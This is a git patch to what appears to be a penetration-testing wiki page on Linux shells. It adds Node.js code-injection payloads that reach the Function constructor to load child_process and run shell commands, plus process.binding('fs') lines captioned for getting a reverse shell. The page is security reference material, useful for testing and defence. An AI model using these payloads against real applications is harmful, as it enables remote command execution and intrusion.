From 17e40afefd740ba4c71e6f406aff3b7c7681c485 Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Sun, 29 May 2022 23:24:32 +0000
Subject: [PATCH] GitBook: [#3225] No subject

---
 generic-methodologies-and-resources/shells/linux.md | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/generic-methodologies-and-resources/shells/linux.md b/generic-methodologies-and-resources/shells/linux.md
index f8cf74b75..72c96786f 100644
--- a/generic-methodologies-and-resources/shells/linux.md
+++ b/generic-methodologies-and-resources/shells/linux.md
@@ -194,6 +194,19 @@ or
 
 or
 
+// If you get to the constructor of a function you can define and execute another function inside a string
+"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
+"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
+
+
+or
+
+// Abuse this syntax to get a reverse shell
+var fs = this.process.binding('fs');
+var fs = process.binding('fs');
+
+or
+
 https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
 ```